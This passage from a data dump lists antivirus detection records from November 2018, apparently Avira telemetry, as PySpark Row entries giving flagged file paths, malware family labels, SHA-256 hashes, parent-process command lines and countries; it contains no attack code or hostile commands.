  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1589ea5b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1589ea5b.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3cib2vocpfn\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='вкр.exe', filepath='C:\\Users\\X\\Desktop\\кнспекты\\вкр\\вкр.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Bk7BOSt4+kmp7Ux9.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T14:53:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ca53ec8e05f6833aae82402c99b6fa6df3a8f356', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ca53ec8e05f6833aae82402c99b6fa6df3a8f356', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='e778957a66edf410347bf5571bedb406ee81cba64a506892b29437c5d57ceda9', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:55:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102002-b9b078b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-102002-B9B078B4', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2xkqra3d2vr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dpinst.exe', filepath='D:\\pro\\BROTHER\\125\\install\\driver\\gdi\\32\\ger\\DPInst.exe', filesize=1000000, name='W32/Sality.AT.#M1.#R1'), hash='992d995d938615dc08c3d98b0be976bdc3ae4c9a858396d57c2795300db71042', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:59:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo msg..exe', filepath='G:\\Software 2018\\YAHOO MSG..exe', filesize=8640000, name='TR/Patched.Ren.Gen.#M2.#R3333'), hash='bfd5c47d2d13c16b097714f493dabe2b1f2a8940547fcc459ff6a58d822cb774', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bj.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\bj\\bj.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trust.exe', filepath='E:\\\xa0\\cygwin\\bin\\trust.exe', filesize=192000, name='HEUR/AGEN.1018727.#M1.#R1'), hash='99141f65ef7f2f9c1425a13e0f8304f0c14104b182306e68d6ce6f6cd3645e96', metadata=Row(cmdline='E:\\\\\\\\', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-02T05:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='digreg.exe', filepath='F:\\العاب 2014\\العاب جديدة\\كل واجرى\\digreg.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='fa1ee7414cf5e17415a9f878a60e7cb2d2c4fe70dbf42b10341d6ce46060ca40', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:20:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010943.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010943.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294ff4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294ff4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:54:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ab4c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab4c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ee7b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ee7b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:09:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090102-9a904b71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085528-6E0DED0D\\AVSCAN-20181104-090102-9A904B71', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:32:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239448', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239448', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:39:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131236-b49df754', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-131236-B49DF754', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gacutil.exe', filepath='C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v8.0A\\bin\\NETFX 4.0 Tools\\x64\\gacutil.exe', filesize=172000, name='W32/Neshta.A.#M1.#R1'), hash='d46cde95733160114a1ce30d868d69b5d4e714fd9b9b0910ab8d141865c23f4f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:7s2Ufj7IgU2HVgcw.1', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\8a22aab90e5609dee3a97ef4c6421c5b\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23930_none_75d1609092e92648\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fb31557b9283d4740c4f51b2e26cc8cdb19a49a526c876dd761c3c0c25480ee1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:20:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151143-1493e433', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-151143-1493E433', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:12:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='14e3bd94.exe', filepath='N:\\\xa0\\.Trashes\\14e3bd94.exe', filesize=128000, name='TR/Crypt.Xpack.8894.#M1.#R1'), hash='f25c1daf238a29d6211ff51ea00bb12d968e281d6e06ff4599ce9e62a5574578', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:57:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='berkeliumx.exe', filepath='C:\\Users\\X\\Downloads\\Warz-R FULLdsfds\\Warz-R FULL\\berkeliumx.exe', filesize=64000, name='TR/KillAll.zxrko.#M1.#R1'), hash='f7a90a048a56ad18b6598812df82e3490bc063fbbbcf2ab99d21af2f31d345c8', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:22:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-083516-6517b6f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4676877a\\AVSCAN-20181101-083448-5FCD14D4\\AVSCAN-20181101-083516-6517B6F7', filesize=20000, name='TR/Dialer.cvk.#M1.#R1'), hash='f68c9bf1d58ca345a9e06babc2be7f7c8c463bf3322b5a26358d1ed9879ba438', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\品質管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='f418c582b9729b1097ce8bfce8d2f5fe2e8cf3c6f71e9108973ccbf839f7ac1e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:32Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3D5EC02ECB4FD63F5B804AACD3DED40DA54EE436BFF151DA545DE7216C5B67F0', filesize=1312000, name='TR/Crypt.XPACK.Gen.#M300.#R3904'), hash='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='i386.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\modules\\lib\\i386\\i386.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100218-1b936f43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b3c77d8\\AVSCAN-20181102-100046-0F54566B\\AVSCAN-20181102-100218-1B936F43', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8ee1ae3b9eb955597095fd702bef4fce9f447068', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ee1ae3b9eb955597095fd702bef4fce9f447068', filesize=2112000, name='Adware/DealPly.25a0a4.#M1.#R1'), hash='25a0a400f0303d8f77edadd093db30413123768cb66a957616dafe58f8d9b416', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083334-514ae521', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3ca1d49\\AVSCAN-20181102-083309-4D010CC2\\AVSCAN-20181102-083334-514AE521', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='0404e94fb8da402743222554e04c0ee17b27badb88f94f144b8935317e587f97', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='final.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku\\final\\final.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1adcd3c0c786fe2b4b7003ca5137bb46d6fe4391b9ad74a201985173a2517507', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\ProgramData\\WmiAppSrv\\svchost.exe', parentsize=1057792, timestamp='2018-11-02T16:34:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='outputforflash.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\plugins\\htmlwriter\\assets\\outputforflash\\outputforflash.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9259453\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:09:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100125-1470a0bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b3c77d8\\AVSCAN-20181102-100046-0F54566B\\AVSCAN-20181102-100125-1470A0BF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:58:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xupobmmfb.exe', filepath='C:\\Program Files\\T9ZMWGI9OS\\XUPOBMMFB.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-00-43-38.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T19:13:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7981074\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\09A30B124411BBAB4C3F9E43FD6912029F1BE751532C89B44D20E092F8D6368C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190316-7dc38580', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190316-7DC38580', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\0D70C1750382FB0BA03B7D6912C1A3C425C0AAFB7A2CC66464A27100EF6A1C4C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:35:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp1221605\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:44Z'), dt=datetime.date(2018, 11, 2)),
